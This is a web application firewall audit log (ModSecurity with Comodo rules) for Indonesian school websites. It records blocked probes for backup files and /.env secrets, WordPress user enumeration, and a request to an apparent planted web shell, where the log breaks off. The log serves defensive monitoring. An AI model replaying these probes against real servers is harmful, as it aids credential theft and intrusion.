X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700328 --36633d0f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --36633d0f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228603151 1796 (- - -) Stopwatch2: 1747683228603151 1796; combined=662, p1=324, p2=312, p3=0, p4=0, p5=26, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36633d0f-Z-- --c35be04b-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oggAAAFQ 103.236.140.4 35916 103.236.140.4 8181 --c35be04b-B-- GET /erpustakaansmkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182673 --c35be04b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c35be04b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228618680 1496 (- - -) Stopwatch2: 1747683228618680 1496; combined=608, p1=286, p2=298, p3=0, p4=0, p5=24, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c35be04b-Z-- --5451b41d-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ohAAAAE0 103.236.140.4 35916 103.236.140.4 8181 --5451b41d-B-- GET /2024.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182686 --5451b41d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5451b41d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228632098 1955 (- - -) Stopwatch2: 1747683228632098 1955; combined=753, p1=340, p2=386, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5451b41d-Z-- --0828662f-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ohgAAAEI 103.236.140.4 35916 103.236.140.4 8181 --0828662f-B-- GET /2018.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 OPR/53.0.2907.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700341 --0828662f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0828662f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228646596 1575 (- - -) Stopwatch2: 1747683228646596 1575; combined=638, p1=319, p2=290, p3=0, p4=0, p5=28, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0828662f-Z-- --c6983c40-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ohwAAAFE 103.236.140.4 35922 103.236.140.4 8181 --c6983c40-B-- GET /wp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872182 --c6983c40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c6983c40-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228646752 1563 (- - -) Stopwatch2: 1747683228646752 1563; combined=617, p1=304, p2=285, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6983c40-Z-- --2012e70d-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oiAAAAFY 103.236.140.4 35922 103.236.140.4 8181 --2012e70d-B-- GET /local.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 OPR/52.0.2871.99 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700350 --2012e70d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2012e70d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228654874 1605 (- - -) Stopwatch2: 1747683228654874 1605; combined=629, p1=313, p2=290, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2012e70d-Z-- --d133d517-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oigAAAEU 103.236.140.4 35922 103.236.140.4 8181 --d133d517-B-- GET /data.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906435 --d133d517-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d133d517-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228683524 1558 (- - -) Stopwatch2: 1747683228683524 1558; combined=583, p1=284, p2=274, p3=0, p4=0, p5=25, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d133d517-Z-- --3097060e-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9oiwAAAE4 103.236.140.4 35916 103.236.140.4 8181 --3097060e-B-- GET /2019.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 OPR/54.0.2952.64 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872200 --3097060e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3097060e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228684311 1500 (- - -) Stopwatch2: 1747683228684311 1500; combined=619, p1=290, p2=302, p3=0, p4=0, p5=27, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3097060e-Z-- --14a94306-A-- [20/May/2025:02:33:48 +0700] aCuHnAZaP57SewDBUi9ojQAAAEM 103.236.140.4 35916 103.236.140.4 8181 --14a94306-B-- GET /erpustakaan.smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161448106 --14a94306-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --14a94306-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683228718591 1625 (- - -) Stopwatch2: 1747683228718591 1625; combined=684, p1=320, p2=337, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14a94306-Z-- --15e74537-A-- [20/May/2025:02:55:34 +0700] aCuMtgZaP57SewDBUi9wkAAAAFE 103.236.140.4 59134 103.236.140.4 8181 --15e74537-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 85.13.86.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 85.13.86.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --15e74537-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15e74537-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747684534668193 2765 (- - -) Stopwatch2: 1747684534668193 2765; combined=1293, p1=416, p2=843, p3=0, p4=0, p5=34, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15e74537-Z-- --90a65905-A-- [20/May/2025:03:13:13 +0700] aCuQ2b8BMImlI6dyVeOQEQAAAMU 103.236.140.4 49176 103.236.140.4 8181 --90a65905-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.157.214 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.157.214 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --90a65905-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90a65905-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747685593304356 757 (- - -) Stopwatch2: 1747685593304356 757; combined=335, p1=278, p2=0, p3=0, p4=0, p5=57, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90a65905-Z-- --1934b601-A-- [20/May/2025:03:24:21 +0700] aCuTdWyGBQNQTJej4E6K6wAAAJg 103.236.140.4 60404 103.236.140.4 8181 --1934b601-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Googlebot-Video/1.0 Accept-Charset: utf-8 --1934b601-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1934b601-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747686261351351 745 (- - -) Stopwatch2: 1747686261351351 745; combined=321, p1=280, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1934b601-Z-- --5206997f-A-- [20/May/2025:03:26:54 +0700] aCuUDjuVdcwZ_qZ5ZIo1nwAAAAo 103.236.140.4 34616 103.236.140.4 8181 --5206997f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.232.225.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.232.225.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5206997f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5206997f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747686414904006 2898 (- - -) Stopwatch2: 1747686414904006 2898; combined=1334, p1=429, p2=870, p3=0, p4=0, p5=35, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5206997f-Z-- --8ebcbf2b-A-- [20/May/2025:03:32:42 +0700] aCuVajuVdcwZ_qZ5ZIo2lQAAAAY 103.236.140.4 39564 103.236.140.4 8181 --8ebcbf2b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8ebcbf2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ebcbf2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747686762327538 768 (- - -) Stopwatch2: 1747686762327538 768; combined=332, p1=296, p2=0, p3=0, p4=0, p5=36, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ebcbf2b-Z-- --3e30b954-A-- [20/May/2025:03:32:45 +0700] aCuVbTuVdcwZ_qZ5ZIo2mQAAABE 103.236.140.4 39616 103.236.140.4 8181 --3e30b954-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.190 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.190 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --3e30b954-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e30b954-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747686765756784 744 (- - -) Stopwatch2: 1747686765756784 744; combined=313, p1=267, p2=0, p3=0, p4=0, p5=46, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e30b954-Z-- --c4a7407f-A-- [20/May/2025:03:42:05 +0700] aCuXnWyGBQNQTJej4E6O1AAAAIs 103.236.140.4 47436 103.236.140.4 8181 --c4a7407f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.29.229.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.29.229.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c4a7407f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4a7407f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747687325560596 2708 (- - -) Stopwatch2: 1747687325560596 2708; combined=1234, p1=412, p2=792, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4a7407f-Z-- --f01c9778-A-- [20/May/2025:04:18:43 +0700] aCugM_jdRvl4szSJA_YfHAAAAIk 103.236.140.4 45238 103.236.140.4 8181 --f01c9778-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 Accept-Charset: utf-8 --f01c9778-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f01c9778-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747689523503068 787 (- - -) Stopwatch2: 1747689523503068 787; combined=325, p1=286, p2=0, p3=0, p4=0, p5=39, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f01c9778-Z-- --1f06161e-A-- [20/May/2025:04:26:08 +0700] aCuh8PjdRvl4szSJA_YhVwAAAJg 103.236.140.4 58454 103.236.140.4 8181 --1f06161e-B-- GET /wp-content/uploads/mfw-activity-logger/csv-uploads/TitaniumEx.php?Titanium=Ex HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 611 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --1f06161e-C-- 